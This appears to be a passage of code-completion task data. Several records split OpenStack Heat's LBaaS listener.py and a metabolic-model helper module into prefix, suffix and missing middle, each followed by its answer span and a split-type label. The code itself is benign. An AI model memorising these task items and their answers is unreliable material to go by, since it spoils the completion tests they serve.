client_plugin=self.client_plugin(),
finder='find_resourceid_by_name_or_id',
entity='loadbalancer'
),
]
def validate(self):
res = super(Listener, self).validate()
if res:
return res
if self.properties[self.PROTOCOL] == self.TERMINATED_HTTPS:
if self.properties[self.DEFAULT_TLS_CONTAINER_REF] is None:
msg = (_('Property %(ref)s required when protocol is '
'%(term)s.') % {'ref': self.DEFAULT_TLS_CONTAINER_REF,
'term': self.TERMINATED_HTTPS})
raise exception.StackValidationFailed(message=msg)
def _check_lb_status(self):
lb_id = self.properties[self.LOADBALANCER]
return self.client_plugin().check_lb_status(lb_id)
def handle_create(self):
properties = self.prepare_properties(
self.properties,
self.physical_resource_name())
properties['loadbalancer_id'] = properties.pop(self.LOADBALANCER)
return properties
def check_create_complete(self, properties):
if self.resource_id is None:
try:
listener = self.client().create_listener(
{'listener': properties})['listener']
self.resource_id_set(listener['id'])
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
raise
return self._check_lb_status()
def _show_resource(self):
return self.client().show_listener(
self.resource_id)['listener']
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
self._update_called = False
return prop_diff
def check_update_complete(self, prop_diff):
if not prop_diff:
return True
if not self._update_called:
try:
self.client().update_listener(self.resource_id,
{'listener': prop_diff})
self._update_called = True
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
raise
return self._check_lb_status()
def | (self):
self._delete_called = False
def check_delete_complete(self, data):
if self.resource_id is None:
return True
if not self._delete_called:
try:
self.client().delete_listener(self.resource_id)
self._delete_called = True
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
elif self.client_plugin().is_not_found(ex):
return True
raise
return self._check_lb_status()
def resource_mapping():
return {
'OS::Neutron::LBaaS::Listener': Listener,
}
| handle_delete | identifier_name |
listener.py | #
# Copyright 2015 IBM Corp.
#
# All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from heat.common import exception
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine.resources.openstack.neutron import neutron
from heat.engine import support
from heat.engine import translation
class Listener(neutron.NeutronResource):
"""A resource for managing LBaaS v2 Listeners.
This resource creates and manages Neutron LBaaS v2 Listeners,
which represent a listening endpoint for the vip.
"""
support_status = support.SupportStatus(version='6.0.0')
required_service_extension = 'lbaasv2'
PROPERTIES = (
PROTOCOL_PORT, PROTOCOL, LOADBALANCER, NAME,
ADMIN_STATE_UP, DESCRIPTION, DEFAULT_TLS_CONTAINER_REF,
SNI_CONTAINER_REFS, CONNECTION_LIMIT, TENANT_ID
) = (
'protocol_port', 'protocol', 'loadbalancer', 'name',
'admin_state_up', 'description', 'default_tls_container_ref',
'sni_container_refs', 'connection_limit', 'tenant_id'
)
PROTOCOLS = (
TCP, HTTP, HTTPS, TERMINATED_HTTPS,
) = (
'TCP', 'HTTP', 'HTTPS', 'TERMINATED_HTTPS',
)
ATTRIBUTES = (
LOADBALANCERS_ATTR, DEFAULT_POOL_ID_ATTR
) = (
'loadbalancers', 'default_pool_id'
)
properties_schema = {
PROTOCOL_PORT: properties.Schema(
properties.Schema.INTEGER,
_('TCP or UDP port on which to listen for client traffic.'),
required=True,
constraints=[
constraints.Range(1, 65535),
]
),
PROTOCOL: properties.Schema(
properties.Schema.STRING,
_('Protocol on which to listen for the client traffic.'),
required=True,
constraints=[
constraints.AllowedValues(PROTOCOLS),
]
),
LOADBALANCER: properties.Schema(
properties.Schema.STRING,
_('ID or name of the load balancer with which listener '
'is associated.'),
required=True,
constraints=[
constraints.CustomConstraint('neutron.lbaas.loadbalancer')
]
),
NAME: properties.Schema(
properties.Schema.STRING,
_('Name of this listener.'),
update_allowed=True
),
ADMIN_STATE_UP: properties.Schema(
properties.Schema.BOOLEAN,
_('The administrative state of this listener.'),
update_allowed=True,
default=True
),
DESCRIPTION: properties.Schema(
properties.Schema.STRING,
_('Description of this listener.'),
update_allowed=True,
default=''
),
DEFAULT_TLS_CONTAINER_REF: properties.Schema(
properties.Schema.STRING,
_('Default TLS container reference to retrieve TLS '
'information.'),
update_allowed=True
),
SNI_CONTAINER_REFS: properties.Schema(
properties.Schema.LIST,
_('List of TLS container references for SNI.'),
update_allowed=True
),
CONNECTION_LIMIT: properties.Schema(
properties.Schema.INTEGER,
_('The maximum number of connections permitted for this '
'load balancer. Defaults to -1, which is infinite.'),
update_allowed=True,
default=-1,
constraints=[
constraints.Range(min=-1),
]
),
TENANT_ID: properties.Schema(
properties.Schema.STRING,
_('The ID of the tenant who owns the listener.')
),
}
attributes_schema = {
LOADBALANCERS_ATTR: attributes.Schema(
_('ID of the load balancer this listener is associated to.'),
type=attributes.Schema.LIST
),
DEFAULT_POOL_ID_ATTR: attributes.Schema(
_('ID of the default pool this listener is associated to.'),
type=attributes.Schema.STRING
)
}
def translation_rules(self, props):
return [
translation.TranslationRule(
props,
translation.TranslationRule.RESOLVE,
[self.LOADBALANCER],
client_plugin=self.client_plugin(),
finder='find_resourceid_by_name_or_id',
entity='loadbalancer'
),
]
def validate(self):
res = super(Listener, self).validate()
if res:
return res
if self.properties[self.PROTOCOL] == self.TERMINATED_HTTPS:
if self.properties[self.DEFAULT_TLS_CONTAINER_REF] is None:
msg = (_('Property %(ref)s required when protocol is '
'%(term)s.') % {'ref': self.DEFAULT_TLS_CONTAINER_REF,
'term': self.TERMINATED_HTTPS})
raise exception.StackValidationFailed(message=msg)
def _check_lb_status(self):
|
def handle_create(self):
properties = self.prepare_properties(
self.properties,
self.physical_resource_name())
properties['loadbalancer_id'] = properties.pop(self.LOADBALANCER)
return properties
def check_create_complete(self, properties):
if self.resource_id is None:
try:
listener = self.client().create_listener(
{'listener': properties})['listener']
self.resource_id_set(listener['id'])
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
raise
return self._check_lb_status()
def _show_resource(self):
return self.client().show_listener(
self.resource_id)['listener']
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
self._update_called = False
return prop_diff
def check_update_complete(self, prop_diff):
if not prop_diff:
return True
if not self._update_called:
try:
self.client().update_listener(self.resource_id,
{'listener': prop_diff})
self._update_called = True
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
raise
return self._check_lb_status()
def handle_delete(self):
self._delete_called = False
def check_delete_complete(self, data):
if self.resource_id is None:
return True
if not self._delete_called:
try:
self.client().delete_listener(self.resource_id)
self._delete_called = True
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
elif self.client_plugin().is_not_found(ex):
return True
raise
return self._check_lb_status()
def resource_mapping():
return {
'OS::Neutron::LBaaS::Listener': Listener,
}
| lb_id = self.properties[self.LOADBALANCER]
return self.client_plugin().check_lb_status(lb_id) | identifier_body |
listener.py | #
# Copyright 2015 IBM Corp.
#
# All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from heat.common import exception
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine.resources.openstack.neutron import neutron
from heat.engine import support
from heat.engine import translation
class Listener(neutron.NeutronResource):
"""A resource for managing LBaaS v2 Listeners.
This resource creates and manages Neutron LBaaS v2 Listeners,
which represent a listening endpoint for the vip.
"""
support_status = support.SupportStatus(version='6.0.0')
required_service_extension = 'lbaasv2'
PROPERTIES = (
PROTOCOL_PORT, PROTOCOL, LOADBALANCER, NAME,
ADMIN_STATE_UP, DESCRIPTION, DEFAULT_TLS_CONTAINER_REF,
SNI_CONTAINER_REFS, CONNECTION_LIMIT, TENANT_ID
) = (
'protocol_port', 'protocol', 'loadbalancer', 'name',
'admin_state_up', 'description', 'default_tls_container_ref',
'sni_container_refs', 'connection_limit', 'tenant_id'
)
PROTOCOLS = (
TCP, HTTP, HTTPS, TERMINATED_HTTPS,
) = (
'TCP', 'HTTP', 'HTTPS', 'TERMINATED_HTTPS',
)
ATTRIBUTES = (
LOADBALANCERS_ATTR, DEFAULT_POOL_ID_ATTR
) = (
'loadbalancers', 'default_pool_id'
)
properties_schema = {
PROTOCOL_PORT: properties.Schema(
properties.Schema.INTEGER,
_('TCP or UDP port on which to listen for client traffic.'),
required=True,
constraints=[
constraints.Range(1, 65535),
]
),
PROTOCOL: properties.Schema(
properties.Schema.STRING,
_('Protocol on which to listen for the client traffic.'),
required=True,
constraints=[
constraints.AllowedValues(PROTOCOLS),
]
),
LOADBALANCER: properties.Schema(
properties.Schema.STRING,
_('ID or name of the load balancer with which listener '
'is associated.'),
required=True,
constraints=[
constraints.CustomConstraint('neutron.lbaas.loadbalancer')
]
),
NAME: properties.Schema(
properties.Schema.STRING,
_('Name of this listener.'),
update_allowed=True
),
ADMIN_STATE_UP: properties.Schema(
properties.Schema.BOOLEAN,
_('The administrative state of this listener.'),
update_allowed=True,
default=True
),
DESCRIPTION: properties.Schema(
properties.Schema.STRING,
_('Description of this listener.'),
update_allowed=True,
default=''
),
DEFAULT_TLS_CONTAINER_REF: properties.Schema(
properties.Schema.STRING,
_('Default TLS container reference to retrieve TLS '
'information.'),
update_allowed=True
),
SNI_CONTAINER_REFS: properties.Schema(
properties.Schema.LIST,
_('List of TLS container references for SNI.'),
update_allowed=True
),
CONNECTION_LIMIT: properties.Schema(
properties.Schema.INTEGER,
_('The maximum number of connections permitted for this '
'load balancer. Defaults to -1, which is infinite.'),
update_allowed=True,
default=-1,
constraints=[
constraints.Range(min=-1),
]
),
TENANT_ID: properties.Schema(
properties.Schema.STRING,
_('The ID of the tenant who owns the listener.')
),
}
attributes_schema = {
LOADBALANCERS_ATTR: attributes.Schema(
_('ID of the load balancer this listener is associated to.'),
type=attributes.Schema.LIST
),
DEFAULT_POOL_ID_ATTR: attributes.Schema(
_('ID of the default pool this listener is associated to.'),
type=attributes.Schema.STRING
)
}
def translation_rules(self, props):
return [
translation.TranslationRule(
props,
translation.TranslationRule.RESOLVE,
[self.LOADBALANCER],
client_plugin=self.client_plugin(),
finder='find_resourceid_by_name_or_id',
entity='loadbalancer'
),
]
def validate(self):
res = super(Listener, self).validate()
if res:
return res
if self.properties[self.PROTOCOL] == self.TERMINATED_HTTPS:
if self.properties[self.DEFAULT_TLS_CONTAINER_REF] is None:
msg = (_('Property %(ref)s required when protocol is '
'%(term)s.') % {'ref': self.DEFAULT_TLS_CONTAINER_REF,
'term': self.TERMINATED_HTTPS})
raise exception.StackValidationFailed(message=msg)
def _check_lb_status(self):
lb_id = self.properties[self.LOADBALANCER]
return self.client_plugin().check_lb_status(lb_id)
def handle_create(self):
properties = self.prepare_properties(
self.properties,
self.physical_resource_name())
properties['loadbalancer_id'] = properties.pop(self.LOADBALANCER)
return properties
def check_create_complete(self, properties):
if self.resource_id is None:
try:
listener = self.client().create_listener(
{'listener': properties})['listener']
self.resource_id_set(listener['id'])
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
raise
return self._check_lb_status()
def _show_resource(self):
return self.client().show_listener(
self.resource_id)['listener']
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
self._update_called = False
return prop_diff
def check_update_complete(self, prop_diff):
if not prop_diff:
return True
if not self._update_called:
try:
self.client().update_listener(self.resource_id,
{'listener': prop_diff})
self._update_called = True
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
raise
return self._check_lb_status()
def handle_delete(self):
self._delete_called = False
def check_delete_complete(self, data):
if self.resource_id is None:
return True
if not self._delete_called:
try:
self.client().delete_listener(self.resource_id)
self._delete_called = True
except Exception as ex:
if self.client_plugin().is_invalid(ex):
|
elif self.client_plugin().is_not_found(ex):
return True
raise
return self._check_lb_status()
def resource_mapping():
return {
'OS::Neutron::LBaaS::Listener': Listener,
}
| return False | conditional_block |
listener.py | #
# Copyright 2015 IBM Corp.
#
# All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from heat.common import exception
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine.resources.openstack.neutron import neutron
from heat.engine import support
from heat.engine import translation
class Listener(neutron.NeutronResource):
"""A resource for managing LBaaS v2 Listeners.
This resource creates and manages Neutron LBaaS v2 Listeners,
which represent a listening endpoint for the vip.
"""
support_status = support.SupportStatus(version='6.0.0')
required_service_extension = 'lbaasv2'
PROPERTIES = (
PROTOCOL_PORT, PROTOCOL, LOADBALANCER, NAME,
ADMIN_STATE_UP, DESCRIPTION, DEFAULT_TLS_CONTAINER_REF,
SNI_CONTAINER_REFS, CONNECTION_LIMIT, TENANT_ID
) = (
'protocol_port', 'protocol', 'loadbalancer', 'name',
'admin_state_up', 'description', 'default_tls_container_ref',
'sni_container_refs', 'connection_limit', 'tenant_id'
)
PROTOCOLS = (
TCP, HTTP, HTTPS, TERMINATED_HTTPS,
) = (
'TCP', 'HTTP', 'HTTPS', 'TERMINATED_HTTPS',
)
ATTRIBUTES = (
LOADBALANCERS_ATTR, DEFAULT_POOL_ID_ATTR
) = (
'loadbalancers', 'default_pool_id'
)
properties_schema = {
PROTOCOL_PORT: properties.Schema(
properties.Schema.INTEGER,
_('TCP or UDP port on which to listen for client traffic.'),
required=True,
constraints=[
constraints.Range(1, 65535),
]
),
PROTOCOL: properties.Schema(
properties.Schema.STRING,
_('Protocol on which to listen for the client traffic.'),
required=True,
constraints=[
constraints.AllowedValues(PROTOCOLS),
]
),
LOADBALANCER: properties.Schema(
properties.Schema.STRING,
_('ID or name of the load balancer with which listener '
'is associated.'),
required=True,
constraints=[
constraints.CustomConstraint('neutron.lbaas.loadbalancer')
]
),
NAME: properties.Schema(
properties.Schema.STRING,
_('Name of this listener.'),
update_allowed=True
),
ADMIN_STATE_UP: properties.Schema(
properties.Schema.BOOLEAN,
_('The administrative state of this listener.'),
update_allowed=True,
default=True
),
DESCRIPTION: properties.Schema(
properties.Schema.STRING,
_('Description of this listener.'),
update_allowed=True,
default=''
),
DEFAULT_TLS_CONTAINER_REF: properties.Schema(
properties.Schema.STRING,
_('Default TLS container reference to retrieve TLS '
'information.'),
update_allowed=True
),
SNI_CONTAINER_REFS: properties.Schema(
properties.Schema.LIST,
_('List of TLS container references for SNI.'),
update_allowed=True
),
CONNECTION_LIMIT: properties.Schema(
properties.Schema.INTEGER,
_('The maximum number of connections permitted for this '
'load balancer. Defaults to -1, which is infinite.'),
update_allowed=True,
default=-1,
constraints=[
constraints.Range(min=-1),
]
),
TENANT_ID: properties.Schema(
properties.Schema.STRING,
_('The ID of the tenant who owns the listener.')
),
}
attributes_schema = {
LOADBALANCERS_ATTR: attributes.Schema(
_('ID of the load balancer this listener is associated to.'),
type=attributes.Schema.LIST
),
DEFAULT_POOL_ID_ATTR: attributes.Schema(
_('ID of the default pool this listener is associated to.'),
type=attributes.Schema.STRING
)
}
def translation_rules(self, props):
return [
translation.TranslationRule(
props,
translation.TranslationRule.RESOLVE,
[self.LOADBALANCER],
client_plugin=self.client_plugin(),
finder='find_resourceid_by_name_or_id',
entity='loadbalancer'
),
]
def validate(self):
res = super(Listener, self).validate()
if res:
return res
if self.properties[self.PROTOCOL] == self.TERMINATED_HTTPS:
if self.properties[self.DEFAULT_TLS_CONTAINER_REF] is None:
msg = (_('Property %(ref)s required when protocol is '
'%(term)s.') % {'ref': self.DEFAULT_TLS_CONTAINER_REF,
'term': self.TERMINATED_HTTPS})
raise exception.StackValidationFailed(message=msg)
def _check_lb_status(self):
lb_id = self.properties[self.LOADBALANCER]
return self.client_plugin().check_lb_status(lb_id)
def handle_create(self):
properties = self.prepare_properties(
self.properties,
self.physical_resource_name())
properties['loadbalancer_id'] = properties.pop(self.LOADBALANCER)
return properties
def check_create_complete(self, properties):
if self.resource_id is None:
try:
listener = self.client().create_listener(
{'listener': properties})['listener']
self.resource_id_set(listener['id'])
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
raise
return self._check_lb_status()
def _show_resource(self):
return self.client().show_listener(
self.resource_id)['listener']
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
self._update_called = False
return prop_diff
def check_update_complete(self, prop_diff):
if not prop_diff:
return True | try:
self.client().update_listener(self.resource_id,
{'listener': prop_diff})
self._update_called = True
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
raise
return self._check_lb_status()
def handle_delete(self):
self._delete_called = False
def check_delete_complete(self, data):
if self.resource_id is None:
return True
if not self._delete_called:
try:
self.client().delete_listener(self.resource_id)
self._delete_called = True
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
elif self.client_plugin().is_not_found(ex):
return True
raise
return self._check_lb_status()
def resource_mapping():
return {
'OS::Neutron::LBaaS::Listener': Listener,
} |
if not self._update_called: | random_line_split |
functions.py | from collections import defaultdict
from six import iteritems
def invert_mapping(mapping):
""" Invert a mapping dictionary
Parameters
----------
mapping: dict
Returns
-------
"""
inverted_mapping = defaultdict(list)
for key, value in mapping.items():
if isinstance(value, (list, set)):
for element in value:
inverted_mapping[element].append(key)
else:
inverted_mapping[value].append(key)
return inverted_mapping
def generate_copy_id(base_id, collection, suffix="_copy"):
""" Generate a new id that is not present in collection
Parameters
----------
base_id: str, Original id while copying or New for new entries
collection: dict or list
suffix: str, Suffix that is added to the base id
Returns
-------
"""
composite_id = str(base_id) + suffix
new_id = composite_id
n = 0
# Make sure there is no metabolite with the same id
while new_id in collection:
# Add number to end of id
n += 1
new_id = composite_id + str(n)
return new_id
def get_annotation_to_item_map(list_of_items):
""" Find model items with overlapping annotations
Parameters
----------
item
list_of_items
Returns
-------
"""
annotation_to_item = defaultdict(list)
for item in list_of_items:
for annotation in item.annotation:
annotation_to_item[annotation].append(item)
return annotation_to_item
def convert_to_bool(input_str):
| elif not isinstance(input_str, str):
raise TypeError("Input should be a string or boolean")
else:
return mapping[input_str.lower()]
def check_charge_balance(metabolites):
""" Check charge balance of the reaction """
# Check that charge is set for all metabolites
if not all(x.charge is not None for x in metabolites.keys()):
return None
else:
return sum([metabolite.charge * coefficient for metabolite, coefficient in iteritems(metabolites)])
def check_element_balance(metabolites):
""" Check that the reaction is elementally balanced """
metabolite_elements = defaultdict(int)
for metabolite, coefficient in iteritems(metabolites):
for element, count in iteritems(metabolite.elements):
metabolite_elements[element] += coefficient * count
return {k: v for k, v in iteritems(metabolite_elements) if v != 0}
def reaction_string(stoichiometry, use_metabolite_names=True):
"""Generate the reaction string """
attrib = "id"
if use_metabolite_names:
attrib = "name"
educts = [(str(abs(value)), getattr(key, attrib)) for key, value in iteritems(stoichiometry) if value < 0.]
products = [(str(abs(value)), getattr(key, attrib)) for key, value in iteritems(stoichiometry) if value > 0.]
return " + ".join([" ".join(x) for x in educts])+" --> "+" + ".join([" ".join(x) for x in products])
def unbalanced_metabolites_to_string(in_dict):
substrings = ['{0}: {1:.1f}'.format(*x) for x in in_dict.items()]
return "<br>".join(substrings)
def reaction_balance(metabolites):
""" Check the balancing status of the stoichiometry
Parameters
----------
metabolites : dict - Dictionary of metabolites with stoichiometric coefficnets
Returns
-------
charge_str : str or bool
element_str : str or bool
balanced : str or bool
"""
element_result = check_element_balance(metabolites)
charge_result = check_charge_balance(metabolites)
if charge_result is None:
charge_str = "Unknown"
elif charge_result == 0:
charge_str = "OK"
else:
charge_str = str(charge_result)
if not all(x.formula for x in metabolites.keys()):
element_str = "Unknown"
elif element_result == {}:
element_str = "OK"
else:
element_str = unbalanced_metabolites_to_string(element_result)
if len(metabolites) < 2:
balanced = None
elif element_str == "OK" and charge_str == "OK":
balanced = True
elif element_str not in ("OK", "Unknown") or charge_str not in ("OK", "Unknown"):
balanced = False
else:
balanced = "Unknown"
return charge_str, element_str, balanced
def merge_groups_by_overlap(data):
""" Merge sets
Parameters
----------
data: list
Returns
-------
"""
new_index = list(range(len(data)))
mapping = dict()
data = [set(m) for m in data]
# Iterate over groups in data and merge groups
# to the one with the lowest index
for i, group in enumerate(data):
for element in group:
if element not in mapping:
# Element has not been seen before
# point element to current index
mapping[element] = i
continue
else:
# Get the new location location of the group
# to which the element mapping points
destination = new_location(new_index, mapping[element])
if destination == i:
# Group has already been merged
continue
elif destination > i:
# Merge to lowest index always
destination, i = i, destination
# Merge current group with the one
# the item has been found in before
data[destination].update(data[i])
data[i] = None
# Store new index of group
new_index[i] = destination
i = destination
# Filter out the empty groups
return [g for g in data if g]
def new_location(new_index, n):
""" Find new location
Iteratively follow pointers to new location.
Parameters
----------
new_index: list, Should be initialized from range
n: int
Returns
-------
int
"""
while new_index[n] != n:
n = new_index[n]
return n
def unpack(iterable, cls):
""" Unpack the value
Parameters
----------
iterable
cls
Returns
-------
"""
if len(iterable) == 1:
return iterable.pop()
else:
return cls(iterable)
def text_is_different(input, state):
""" Check if the input is different from output
Test if the input is different to the output
while ignoring the difference between None
and empty string.
Parameters
----------
input: str or None
state: str
Returns
-------
bool
"""
if not input and not state:
return False
else:
return input != state
def restore_state(object, state):
""" Restore the state of an object
Parameters
----------
object: Object which should be restored
state: State from settings
Returns
-------
"""
if state:
object.restoreState(state)
def restore_geometry(object, state):
""" Restore the geometry of an object
Parameters
----------
object: Object which should be restored
state: State from settings
Returns
-------
"""
if state:
object.restoreGeometry(state)
def split_dict_by_value(dictionary):
""" Split dictionary by values
This functions splits dictionary entries based
on the value into positive, negative and zero
dictionaries.
Parameters
----------
dictionary: dict,
Input dictionary
Returns
-------
positive: dict,
Dictionary containg all items with positive value
negative: dict,
Dictionary cotaining all items with negative value
zero: dict,
Dictionary containing all items with zero value
"""
positive, negative, zero = {}, {}, {}
for k, v in dictionary.items():
if v > 0.:
positive[k] = v
elif v < 0.:
negative[k] = v
else:
zero[k] = v
return positive, negative, zero
| """ Convert string of boolean value to actual bolean
PyQt5 stores boolean values as strings 'true' and 'false
in the settings. In order to use those stored values
they need to be converted back to the boolean values.
Parameters
----------
input_str: str
Returns
-------
bool
"""
mapping = {"true": True,
"false": False,
"none": None}
if isinstance(input_str, bool):
return input_str | identifier_body |
functions.py | from collections import defaultdict
from six import iteritems
def invert_mapping(mapping):
""" Invert a mapping dictionary
Parameters
----------
mapping: dict
Returns
-------
"""
inverted_mapping = defaultdict(list)
for key, value in mapping.items():
if isinstance(value, (list, set)):
for element in value:
inverted_mapping[element].append(key)
else:
inverted_mapping[value].append(key)
return inverted_mapping
def generate_copy_id(base_id, collection, suffix="_copy"):
""" Generate a new id that is not present in collection
Parameters
----------
base_id: str, Original id while copying or New for new entries
collection: dict or list
suffix: str, Suffix that is added to the base id
Returns
-------
"""
composite_id = str(base_id) + suffix
new_id = composite_id
n = 0
# Make sure there is no metabolite with the same id
while new_id in collection:
# Add number to end of id
n += 1
new_id = composite_id + str(n)
return new_id
def get_annotation_to_item_map(list_of_items):
""" Find model items with overlapping annotations
Parameters
----------
item
list_of_items
Returns
-------
"""
annotation_to_item = defaultdict(list)
for item in list_of_items:
for annotation in item.annotation:
annotation_to_item[annotation].append(item)
return annotation_to_item
def convert_to_bool(input_str):
""" Convert string of boolean value to actual bolean
PyQt5 stores boolean values as strings 'true' and 'false
in the settings. In order to use those stored values
they need to be converted back to the boolean values.
Parameters
----------
input_str: str
Returns
-------
bool
"""
mapping = {"true": True,
"false": False,
"none": None}
if isinstance(input_str, bool):
return input_str
elif not isinstance(input_str, str):
raise TypeError("Input should be a string or boolean")
else:
return mapping[input_str.lower()]
def check_charge_balance(metabolites):
""" Check charge balance of the reaction """
# Check that charge is set for all metabolites
if not all(x.charge is not None for x in metabolites.keys()):
return None
else:
return sum([metabolite.charge * coefficient for metabolite, coefficient in iteritems(metabolites)])
def check_element_balance(metabolites):
""" Check that the reaction is elementally balanced """
metabolite_elements = defaultdict(int)
for metabolite, coefficient in iteritems(metabolites):
for element, count in iteritems(metabolite.elements):
metabolite_elements[element] += coefficient * count
return {k: v for k, v in iteritems(metabolite_elements) if v != 0}
def reaction_string(stoichiometry, use_metabolite_names=True):
"""Generate the reaction string """
attrib = "id"
if use_metabolite_names:
attrib = "name"
educts = [(str(abs(value)), getattr(key, attrib)) for key, value in iteritems(stoichiometry) if value < 0.]
products = [(str(abs(value)), getattr(key, attrib)) for key, value in iteritems(stoichiometry) if value > 0.]
return " + ".join([" ".join(x) for x in educts])+" --> "+" + ".join([" ".join(x) for x in products])
def unbalanced_metabolites_to_string(in_dict):
substrings = ['{0}: {1:.1f}'.format(*x) for x in in_dict.items()]
return "<br>".join(substrings) | """ Check the balancing status of the stoichiometry
Parameters
----------
metabolites : dict - Dictionary of metabolites with stoichiometric coefficnets
Returns
-------
charge_str : str or bool
element_str : str or bool
balanced : str or bool
"""
element_result = check_element_balance(metabolites)
charge_result = check_charge_balance(metabolites)
if charge_result is None:
charge_str = "Unknown"
elif charge_result == 0:
charge_str = "OK"
else:
charge_str = str(charge_result)
if not all(x.formula for x in metabolites.keys()):
element_str = "Unknown"
elif element_result == {}:
element_str = "OK"
else:
element_str = unbalanced_metabolites_to_string(element_result)
if len(metabolites) < 2:
balanced = None
elif element_str == "OK" and charge_str == "OK":
balanced = True
elif element_str not in ("OK", "Unknown") or charge_str not in ("OK", "Unknown"):
balanced = False
else:
balanced = "Unknown"
return charge_str, element_str, balanced
def merge_groups_by_overlap(data):
""" Merge sets
Parameters
----------
data: list
Returns
-------
"""
new_index = list(range(len(data)))
mapping = dict()
data = [set(m) for m in data]
# Iterate over groups in data and merge groups
# to the one with the lowest index
for i, group in enumerate(data):
for element in group:
if element not in mapping:
# Element has not been seen before
# point element to current index
mapping[element] = i
continue
else:
# Get the new location location of the group
# to which the element mapping points
destination = new_location(new_index, mapping[element])
if destination == i:
# Group has already been merged
continue
elif destination > i:
# Merge to lowest index always
destination, i = i, destination
# Merge current group with the one
# the item has been found in before
data[destination].update(data[i])
data[i] = None
# Store new index of group
new_index[i] = destination
i = destination
# Filter out the empty groups
return [g for g in data if g]
def new_location(new_index, n):
""" Find new location
Iteratively follow pointers to new location.
Parameters
----------
new_index: list, Should be initialized from range
n: int
Returns
-------
int
"""
while new_index[n] != n:
n = new_index[n]
return n
def unpack(iterable, cls):
""" Unpack the value
Parameters
----------
iterable
cls
Returns
-------
"""
if len(iterable) == 1:
return iterable.pop()
else:
return cls(iterable)
def text_is_different(input, state):
""" Check if the input is different from output
Test if the input is different to the output
while ignoring the difference between None
and empty string.
Parameters
----------
input: str or None
state: str
Returns
-------
bool
"""
if not input and not state:
return False
else:
return input != state
def restore_state(object, state):
""" Restore the state of an object
Parameters
----------
object: Object which should be restored
state: State from settings
Returns
-------
"""
if state:
object.restoreState(state)
def restore_geometry(object, state):
""" Restore the geometry of an object
Parameters
----------
object: Object which should be restored
state: State from settings
Returns
-------
"""
if state:
object.restoreGeometry(state)
def split_dict_by_value(dictionary):
""" Split dictionary by values
This functions splits dictionary entries based
on the value into positive, negative and zero
dictionaries.
Parameters
----------
dictionary: dict,
Input dictionary
Returns
-------
positive: dict,
Dictionary containg all items with positive value
negative: dict,
Dictionary cotaining all items with negative value
zero: dict,
Dictionary containing all items with zero value
"""
positive, negative, zero = {}, {}, {}
for k, v in dictionary.items():
if v > 0.:
positive[k] = v
elif v < 0.:
negative[k] = v
else:
zero[k] = v
return positive, negative, zero |
def reaction_balance(metabolites): | random_line_split |
functions.py | from collections import defaultdict
from six import iteritems
def invert_mapping(mapping):
""" Invert a mapping dictionary
Parameters
----------
mapping: dict
Returns
-------
"""
inverted_mapping = defaultdict(list)
for key, value in mapping.items():
if isinstance(value, (list, set)):
for element in value:
inverted_mapping[element].append(key)
else:
inverted_mapping[value].append(key)
return inverted_mapping
def generate_copy_id(base_id, collection, suffix="_copy"):
""" Generate a new id that is not present in collection
Parameters
----------
base_id: str, Original id while copying or New for new entries
collection: dict or list
suffix: str, Suffix that is added to the base id
Returns
-------
"""
composite_id = str(base_id) + suffix
new_id = composite_id
n = 0
# Make sure there is no metabolite with the same id
while new_id in collection:
# Add number to end of id
n += 1
new_id = composite_id + str(n)
return new_id
def get_annotation_to_item_map(list_of_items):
""" Find model items with overlapping annotations
Parameters
----------
item
list_of_items
Returns
-------
"""
annotation_to_item = defaultdict(list)
for item in list_of_items:
for annotation in item.annotation:
annotation_to_item[annotation].append(item)
return annotation_to_item
def convert_to_bool(input_str):
""" Convert string of boolean value to actual bolean
PyQt5 stores boolean values as strings 'true' and 'false
in the settings. In order to use those stored values
they need to be converted back to the boolean values.
Parameters
----------
input_str: str
Returns
-------
bool
"""
mapping = {"true": True,
"false": False,
"none": None}
if isinstance(input_str, bool):
return input_str
elif not isinstance(input_str, str):
raise TypeError("Input should be a string or boolean")
else:
return mapping[input_str.lower()]
def check_charge_balance(metabolites):
""" Check charge balance of the reaction """
# Check that charge is set for all metabolites
if not all(x.charge is not None for x in metabolites.keys()):
return None
else:
return sum([metabolite.charge * coefficient for metabolite, coefficient in iteritems(metabolites)])
def check_element_balance(metabolites):
""" Check that the reaction is elementally balanced """
metabolite_elements = defaultdict(int)
for metabolite, coefficient in iteritems(metabolites):
